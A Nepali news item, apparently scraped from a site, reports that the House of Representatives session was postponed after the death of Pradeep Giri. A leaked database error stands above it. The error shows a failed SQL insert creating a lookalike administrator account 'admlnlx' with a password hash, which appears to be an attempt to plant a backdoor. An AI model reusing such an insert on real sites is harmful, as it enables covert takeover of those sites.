WordPress database error: [Duplicate entry '0' for key 'PRIMARY']INSERT INTO `gi_users` (`user_pass`, `user_nicename`, `user_email`, `user_url`, `user_registered`, `user_activation_key`, `display_name`, `user_login`) VALUES ('$P$BjRLmcrbTvv1C.rRRxD6WoviYl./wv/', 'admlnlx', 'wordpresupport@gaulekhabar.com', '', '2026-01-08 22:49:15', '', 'admlnlx', 'admlnlx')
काठमाण्डौ । प्रतिनिधिसभाको आजका लागि तय गरिएको बैठक स्थगित भएको छ ।
सभामुख अग्निप्रसाद सापकोटाले आजको बैठक सोमबार दिनको १ बजे बस्नेगरी स्थगित गर्नुभएको हो । बैठक आज बिहान ११ बजेका लागि निर्धारित थियो । प्र्रतिनिधिसभाका सचिव गोपालनाथ योगीले बैठक विशेष कारणवश बस्न नसक्ने भएकाले सभामुख सापकोटाले भोलिका लागि तय गर्नुभएको जानकारी दिए ।नेपाली कांग्रेसका नेता एवं समाजवादी चिन्तक प्रदीप गिरीको निधनका कारण आजको बैठक स्थगित भएको बुझिएको छ । रासस